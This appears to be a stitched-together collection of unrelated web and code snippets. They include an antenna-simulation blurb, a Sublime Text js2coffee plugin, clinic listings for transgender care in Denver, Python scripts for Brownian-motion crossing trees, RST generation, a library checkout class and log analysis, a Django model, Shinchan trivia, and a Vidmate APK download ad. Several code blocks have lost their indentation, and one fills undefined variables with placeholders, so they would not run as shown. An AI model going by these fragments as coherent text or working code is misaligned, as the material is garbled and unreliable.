After solving the structure for an operating frequency of 2.9 GHz, you can study the far-field radiation patterns generated by the DRA. You can visualize these patterns on the E-plane and H-plane (left plot below) as well as in 3D (right plot below). The results from the simulations indicate that the resonator and metallic strips help increase the directivity of the antenna.
Left: Far-field radiation pattern on the E-plane (blue) and H-plane (green) at 2.9 GHz. Right: 3D far-field radiation pattern.
As this example demonstrates, you can evaluate a dielectric resonator's effect on an antenna at different frequencies, as well as optimize a DRA design to improve its directivity and gain.
To get started with modeling DRAs, click the button below. Doing so will take you to the Application Gallery, where you can log into your COMSOL Access account and download the MPH-file and step-by-step instructions for the example.
|
import sublime, sublime_plugin
import subprocess


class JsToCoffeescriptCommand(sublime_plugin.TextCommand):
    def run(self, edit):
        view = self.view
        # Get non-empty selections.
        regions = [s for s in view.sel() if not s.empty()]
        # If there's no non-empty selection, convert the whole document.
        if len(regions) == 0:
            regions = [sublime.Region(0, view.size())]
        # Work backwards so earlier replacements don't shift later regions.
        for region in reversed(regions):
            content = view.substr(region)
            new_content = self.js2coffee(content)
            # Leave the region untouched if the conversion failed.
            if new_content is None:
                continue
            view.replace(edit, region, new_content)

    def js2coffee(self, contents):
        # Requires the `js2coffee` command-line tool to be installed and on PATH.
        indentation = 2
        command = "js2coffee -i%d" % indentation
        js2coffee = subprocess.Popen(
            command,
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            shell=True
        )
        output, error = js2coffee.communicate(bytearray(contents, "utf-8"))
        if error:
            print("JsToCoffeescript: ERROR!")
            print("Result: %s" % error.decode("utf-8"))
            return None
        return output.decode("utf-8")
|
Congratulations to Marcia Mavrides on being named a Top Rated Lawyer 2018 by the National Law Journal, a publication covering legal issues and news for the business and private sectors!
Attorney Mavrides owes her success to her ability to work closely with each client, helping them toward a comprehensive and clear understanding of the legal process and its impact on their lives.
See the press release in the Boston Herald, here!
|
import numpy as np
from numpy.random import RandomState
from fgn import fbm
import scipy.io as io
N, H = 2**20 + 1, 0.5
generator = fbm( N = N, H = H, time = True )
generator.set_rnd( RandomState( 123 ) )
T, X = generator( )
io.savemat( './output/data.mat', { 'T': T, 'X': X, 'H': H, 'N': N } )
# import numpy as np
# import scipy.io as io
# mat = io.loadmat( './output/data.mat' )
# H, X, T, N = mat['H'][0], mat['X'][0], mat['T'][0], mat['N'][0]
from crossing_tree import xtree_build, f_get_w
delta = 1e-3 # np.std( np.diff( X ) )
Tnk, Xnk, Znk, Vnk, Wnk = xtree_build( T, X, delta = delta )
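# Naming note (inferred from the usage below, not from crossing_tree's docs):
# Tnk/Xnk appear to hold the crossing times and levels at each tree level,
# Znk the subcrossing counts, Vnk the direction tallies, and Wnk the
# crossing durations.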
print np.unique( Znk[1], return_counts = True )
## %% clear all ; format long ;
## %%
## %% cd c:\study_notes\year_14_15\course_project\code
## %%
## %% load('C:\study_notes\year_14_15\course_project\code\project\output\data.mat')
## %%
## %% Zr = 2 : 2 : 40 ;
## %% delta = 1e-3 ; % std( diff( X ) ) ;
## %% [ w, subx, hp, ht ] = f_get_w( X, T, [ 0 : 16 ], delta, 0 ) ;
## %% Z = [ subx{ 1+1 } ] ;
## %% for z = Zr
## %% sum( Z == z ) %/ length( Z )
## %% end
if False :
## # ht, hp, hx, hv = f_get_w( T, X, range( 0, 17 ), delta )
## # print np.all( [ np.allclose( a0,a1 ) for a0, a1 in zip( Xnk, hp ) ] )
io.savemat( './output/xtree.mat', { 'Xnk': Xnk, 'Tnk': Tnk } )
##
Z = ( X - X[ 0 ] ) / delta
Z_floor = np.floor( Z, np.empty_like( Z, np.float64 ) )
Z_ceil = np.ceil( Z, np.empty_like( Z, np.float64 ) )
io.savemat( './output/ceil_floor.mat', {
'py_ceilz': Z_ceil,
'py_floorz': Z_floor,
} )
################################################################################
delta = np.std( np.diff( X ) )
Tnk, Xnk, Znk, Vnk, Wnk = xtree_build( T, X, delta = delta )
# NOTE: `max_levels` and `max_crossings` are used below but never defined in
# this script; the values here are assumed placeholders so the analysis runs.
max_levels, max_crossings = 16, 40
Nn = np.zeros( ( 1 + max_levels + 1, 1 ), dtype = np.int )
for n, Xk in enumerate( Xnk, 0 ) :
n = max_levels + 1 if n > max_levels + 1 else n
Nn[ n ] += len( Xk ) - 1
Dnk = np.zeros( ( max_levels + 1, max_crossings // 2 ), dtype = np.int )
for n, Zk in enumerate( Znk[ 1: ], 0 ) :
n = max_levels if n > max_levels else n
Z_count, Z_freq = np.unique( Zk, return_counts = True )
Z_count = np.minimum( Z_count, max_crossings )
mask = ( Z_count < max_crossings )
Dnk[ n, Z_count[ mask ] // 2 - 1 ] += Z_freq[ mask ]
Dnk[ n, max_crossings // 2 - 1 ] += np.sum( Z_freq[ ~mask ] )
Vnde = np.zeros( ( max_levels + 1, 2, 2 ), dtype = np.int )
for n, Vk in enumerate( Vnk[ 1: ], 0 ) :
n = max_levels if n > max_levels else n
Vnde[ n, 0 ] += np.sum( Vk[ Vk[ :, 2 ] < 0 ], axis = 0 )[:2]
Vnde[ n, 1 ] += np.sum( Vk[ Vk[ :, 2 ] > 0 ], axis = 0 )[:2]
prc = np.array( [ 0.5, 1.0, 2.5, 5.0, 10, 25, 50, 75, 90, 95, 97.5, 99, 99.5 ] )
Wnp = np.zeros( ( max_levels, ) + prc.shape, dtype = np.float )
Wbarn = np.zeros( ( max_levels, 1 ), dtype = np.float )
Wstdn = np.zeros( ( max_levels, 1 ), dtype = np.float )
for n, Wk in enumerate( Wnk[1:], 0 ) :
if len( Wk ) and n < max_levels :
Wbarn[ n ], Wstdn[ n ], Wnp[ n ] = np.average( Wk ), np.std( Wk ), np.percentile( Wk, prc )
|
Denver Health has been recognized as a leader in LGBT health care by the Human Rights Campaign Foundation for five consecutive years, and with that national recognition and its commitment to LGBT health care, Denver Health is proud to be an “LGBT Center of Excellence.” Denver Health is open, affirming, and provides excellent care for ALL people. At Denver Health, the LGBT-friendly doctors and staff are dedicated to providing high-quality, welcoming health care for all, which means a team of medical providers, including physicians and nurses, is there to care for LGBT patients through family and internal medicine, mental health, and pediatric services.
Denver Health’s LGBT Center of Excellence offers open and affirming health care to transgender and gender-nonconforming populations. Trained medical doctors at nine family health centers and the main campus provide medical assistance, including patient navigation, help updating the gender identification on your credentials, behavioral health services, and general primary care. Gender reassignment surgery (confirmation surgery) options are also offered.
Our patient navigators are dedicated to ensuring that our lesbian, gay, bisexual and transgender patients are supported through their health care journey. All LGBT patients will be connected with welcoming and affirming medical providers for all of their health care needs. If you would like additional support, patient navigators are available to attend medical appointments with you and will continue to be your advocates as you become familiar with our healthcare system.
(303) 602-6760 or (303) 602-6819. / [email protected].
She does not require a letter for hormone therapy.
A transgender-friendly practice with quite a few TG patients. You can see any one of the doctors; however, Dr. Kristin Moreau was recommended to us. The practice offers hormone treatment and requires a letter from a therapist.
(303) 293-2220. Stout Street Health Center is a place to go for transgender indigent health care. They provide hormones and testing, and follow WPATH's guidelines. They also have other services such as counseling, psych care, and eye care. They offer hormone treatment and do not require letters. This clinic is specific to homeless people, so please check with them to see if you qualify for services.
|
#!/usr/bin/env python
import ctk_cli
from rstcloth import rstcloth
import argparse
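
# Usage (the script and file names here are hypothetical examples):
#   python cli2rst.py MyFilter.xml MyFilter.rst
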
def cli2rst(cliFile, rstFile):
cli = ctk_cli.CLIModule(cliFile)
rst = rstcloth.RstCloth()
rst.title(cli.title)
rst.newline()
rst.content(cli.description)
rst.newline()
rst.field('Authors', cli.contributor)
rst.field('Version', cli.version)
rst.field('License', cli.license)
rst.newline()
rst.newline()
for parameterGroup in cli:
rst.h2(parameterGroup.label + ' Parameters')
rst.content(parameterGroup.description)
rst.newline()
for parameter in parameterGroup:
rst.definition(parameter.label, parameter.description, bold=True)
rst.newline()
rst.write(rstFile)


if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Convert a CTK CLI XML description file to a reStructuredText documentation file.')
parser.add_argument('cliFile')
parser.add_argument('rstFile')
args = parser.parse_args()
cli2rst(args.cliFile, args.rstFile)
|
The background of Sammy’s project is listed above under The Epic Project.
Can you help, or do you know of someone in one of these countries? Please contact me either in the comments or via email at [email protected], and I can pass along the address, as well as make a note of which country is being pledged.
And even though he wanted to start here, we’ll still be looking for other countries’ currency.
As we receive word from folks, I’ll strike through the countries on the list (as well as provide some sort of link to the person who responded). I’ll also get a Google Docs document up within the week to track.
|
"""
Define the implementation for Library interface and their class exceptions.
@created_at 2015-05-16
@author Exequiel Fuentes Lettura <[email protected]>
"""
import operator
from book import Book
class LibraryException(Exception):
    """Define an exception class for Library errors"""
    def __init__(self, value):
        self.value = value

    def __str__(self):
        return repr(self.value)


class OutOfBooksException(LibraryException):
    """Define an exception class for OutOfBooks errors"""
    def __init__(self, value):
        self.value = value

    def __str__(self):
        return repr(self.value)


class IllegalRatingException(LibraryException):
    """Define an exception class for IllegalRating errors"""
    def __init__(self, value):
        self.value = value

    def __str__(self):
        return repr(self.value)


# Steps:
# 1. Define a list of books for creating our library
# 2. Implement methods
# 3. Indicate time and space complexity
# 4. Document any unusual edge cases or problems
class Library:
"""Define a class for the library implementation"""
MIN_RATING = 1
MAX_RATING = 100

    def __init__(self):
self.books = {}

    def add_book(self, book):
        """Add a new book to the library. We don't have a db, so we keep the
        books in a dictionary keyed by an auto-incremented id.
        """
        if not book:
            raise LibraryException("Book is null or empty, please add a book")
        # id: primary key of the book (note: the dict stores the Book object
        # itself; availability is tracked on the Book, not in a tuple)
        id = self.library_length() + 1
        self.books[str(id)] = book

    def library_length(self):
"""Return length of the library"""
return len(self.books)

    def print_library(self):
"""Just for checking object in books"""
for id, book in self.books.items():
print "--"
print "book id: %s" % id
print "book title: %s" % book.get_title()
print "book rating: %s" % book.get_rating()
print "book available: %s" % book.get_available()
print "book get_checkin_timestamp: %s" % book.get_checkin_timestamp()

    # Best case scenario: O(n); sorting makes the average and worst case O(n log n)
    def checkout_book(self, genre):
        """Returns the book most recently checked in in this genre, and removes
        it from the pool of available items.
        :param genre: the genre to which the book belongs
        :return: the Book object that has just been checked out
        :raises OutOfBooksException: if there are no books in that genre available
        """
        if not genre:
            raise LibraryException("Missed genre parameter")
        # This scan visits every book in the library, so it's O(n)
        genre_list = []
        for id, book in self.books.items():
            if book.get_genre() == genre and book.get_available():
                genre_list.append(book)
        # Check whether there are any books available
        if not genre_list:
            raise OutOfBooksException("There are no books available in that genre")
        # Sort by check-in timestamp, most recent first (not by rating).
        # Sorting is O(n log n) on average and in the worst case.
        recent_book = sorted(genre_list, key=operator.attrgetter('checkin_timestamp'), reverse=True)[0]
        recent_book.set_available(False)
        return recent_book

    # Average and worst case: O(n)
    def checkin_book(self, returned_book, rating):
        """Returns the book to the library's availability pool, making it the
        last checked-in book and rating the book in the process.
        :param returned_book: the Book that is being checked back in
        :param rating: an integer from 1 to 100 (inclusive) specifying the
                       rating. The last person to rate the book overwrites any
                       previous rating
        :raises IllegalRatingException: if a rating less than 1 or more than 100
                                        is specified
        """
        if not returned_book:
            raise LibraryException("Book is null or empty, please add a book")
        # Note: concatenating a string with an int raises a TypeError, so the
        # messages are formatted instead
        if rating < self.MIN_RATING:
            raise IllegalRatingException("Rating less than %d" % self.MIN_RATING)
        if rating > self.MAX_RATING:
            raise IllegalRatingException("Rating greater than %d" % self.MAX_RATING)
        # I'm assuming the title is unique, so the book is located by title.
        # This takes O(n), where n is the number of books in the library.
        # If the library were a db with an index on the title, the lookup
        # would take less time.
        for id, book in self.books.items():
            if book.get_title() == returned_book.get_title():
                book.set_rating(rating)
                book.set_available(True)
                book.set_checkin_timestamp()
                break
        # Note: if the returned book is not in the library, the loop above
        # silently does nothing.

    # Best case scenario: O(n); sorting makes the average and worst case O(n log n)
    def peek_highest_rated_book(self, genre):
        """Returns the highest rated book in the specified genre, but does not
        remove it from availability.
        :param genre: the genre for which we'd like to retrieve the highest-rated
                      book
        :return: a Book that is the highest-rated book currently available in
                 the genre
        :raises OutOfBooksException: if there are no books in that genre available
        """
        if not genre:
            raise LibraryException("Missed genre parameter")
        # This scan visits every book in the library, so it's O(n)
        genre_list = []
        for id, book in self.books.items():
            if book.get_genre() == genre and book.get_available():
                genre_list.append(book)
        # Check whether there are any books available
        if not genre_list:
            raise OutOfBooksException("There are no books available in that genre")
        # Sort by rating, highest first.
        # Sorting is O(n log n) on average and in the worst case.
        return sorted(genre_list, key=operator.attrgetter('rating'), reverse=True)[0]
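

# A minimal usage sketch; the `Book` constructor call below is an assumption
# for illustration (the real signature lives in the companion `book` module).
if __name__ == "__main__":
    library = Library()
    library.add_book(Book(title="Dune", genre="sci-fi"))
    library.add_book(Book(title="Neuromancer", genre="sci-fi"))
    # Check out the most recently checked-in sci-fi book...
    borrowed = library.checkout_book("sci-fi")
    print "checked out: %s" % borrowed.get_title()
    # ...and return it with a rating between MIN_RATING and MAX_RATING.
    library.checkin_book(borrowed, rating=87)
    print "top rated: %s" % library.peek_highest_rated_book("sci-fi").get_title()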
|
He did reappear as "The Legendary Imagin" in the Shin-MEN episodes, as part of a palette-swapped cameo group of 5 evil clones. There is also a parallel universe where Action Kamen is a real person who travels between the worlds to either act in the show or save the world. On May 13, 2016 he returned permanently with a new voice actor, Hiroshi Kamiya, from episode 894b, "The Adventures of Buriburizaemon: The Revival Chapter".
Buriburizaemon, known as Brave Pig in the LUK Internacional dub, is a cowardly talking pig featured in some of the episodes and chapters set in ancient Japan; he is a product of Shinchan's imagination. Prince Suchan and these two are the key to the treasure. Buriburizaemon also makes a cameo appearance in the "Small Chocobi World" episode. In 1994 he got the first in a series of his own special episodes, called "The Adventures of Buriburizaemon", which feature him not-quite-rescuing damsels in distress in samurai movie scenarios.
Did you know that Shinchan found Shiro in a box? That Shinchan likes watching a TV show called Action Kamen? That Shinchan was originally an adults-only show? This was proven in the second movie, Shinchan in Action Kamen vs Hayegure Rakshas. At one point Shinchan was banned from television by parents due to its adult jokes and kids picking up bad manners; the result was that all adult jokes and scenes were either dubbed into other dialogue, removed, or zoomed.
Welcome to the Shinchan Wiki. The mission of Shinchan Wiki is to record and categorize everything about Shinchan, including characters and episodes from the Shinchan cartoons, mangas, and movies. If you are new to wikis, check out the tutorial. At the Shinchan Base, Shinchan is one of the main shows along with Doraemon and Kiteretsu.
|
""" Main file. All 4 features are running here. """
import sys
from collections import Counter
from datetime import timedelta
import active_users
import busiest_hours
import failed_login
import popular_resources
from io_utils import date_formatting, read_from_file, write_information_to_file
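
# Expected invocation (the script and file names are hypothetical examples):
#   python process_log.py log.txt hosts.txt hours.txt resources.txt blocked.txt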
# File paths
filename = sys.argv[1]
hosts_filename = sys.argv[2]
hours_filename = sys.argv[3]
resources_filename = sys.argv[4]
blocked_filename = sys.argv[5]
# FEATURES 1 and 2
ip_frequency = Counter()
resources = Counter()
for entry in read_from_file(filename):
active_users.count_host_frequency(ip_frequency, entry)
popular_resources.count_bandwidth_resources(resources, entry)
top_hosts = ip_frequency.most_common(10)
# Write results to a file
for host in top_hosts:
information = host[0] + "," + str(host[1])
write_information_to_file(hosts_filename, information)
top_resources = resources.most_common(10)
# Write results to a file
for resource in top_resources:
write_information_to_file(resources_filename, resource[0])
# FEATURE 3
load_meter = busiest_hours.LoadMeter(filename, hours_filename)
load_meter.find_busiest_hours()
# FEATURE 4
access_blocker = failed_login.AccessBlocker(blocked_filename)
for entry in read_from_file(filename):
access_blocker.check_request(entry)
|
This gallery presents a sampling of my architectural images made for a variety of corporate and small business clients (or sometimes just for my own enjoyment). I am a preferred photographer for AvalonBay Communities, one of the largest apartment companies in the U.S. with nearly 300 apartment communities in 14 states, and for Choice Hotels International.
Please contact me at [email protected] if you are in need of residential or commercial real estate photography.
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib.auth.models import User
from django.db import models
from ..member.models import *
from django.db.models.signals import post_save
from django.dispatch import receiver
# Create your models here.
class Association(models.Model):
name = models.CharField(max_length=100)
description = models.TextField()
year_of_creation = models.DateField(auto_now=False, auto_now_add=False, null=True)
address = models.CharField(max_length=100)
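    # Note: an IntegerField drops leading zeros and can't store "+" or dashes;
    # a CharField is usually a safer choice for phone numbers.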
phone = models.IntegerField(null=True)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
# email = models.EmailField(max_length=254, default="")
initials = models.CharField(max_length=25, default="")
logo = models.ImageField(upload_to='Images/Association/logo', blank=True)
country = models.ForeignKey('member.Country', null=True)
identifier = models.OneToOneField(User, null=True, on_delete=models.CASCADE)
email_confirmed = models.BooleanField(default=False)

    def __str__(self):
return self.name
# @receiver(post_save, sender=User)
# def create_association(sender, instance, created, **kwargs):
# if created:
# Association.objects.get_or_create(identifier=instance)
#
# @receiver(post_save, sender=User)
# def save_association(sender, instance, **kwargs):
# instance.association.save()
|
Today almost every Internet user uses YouTube or another video hosting service to upload and watch videos about cats, free movies, and other content. But sometimes you want to download a video file and the service doesn't allow you to do it. That's where the Vidmate app comes in to help you out. It lets you download videos from many services, including YouTube, Vimeo, Facebook, and many other hosting services. To do this, you just need to find a video and click the download button. Plus, the application is free of charge and very easy to use on your Android smartphone! Download the Vidmate APK from https://vidmateapp.pro/apk/ now and start downloading your favourite movies to share them with your friends or family!
|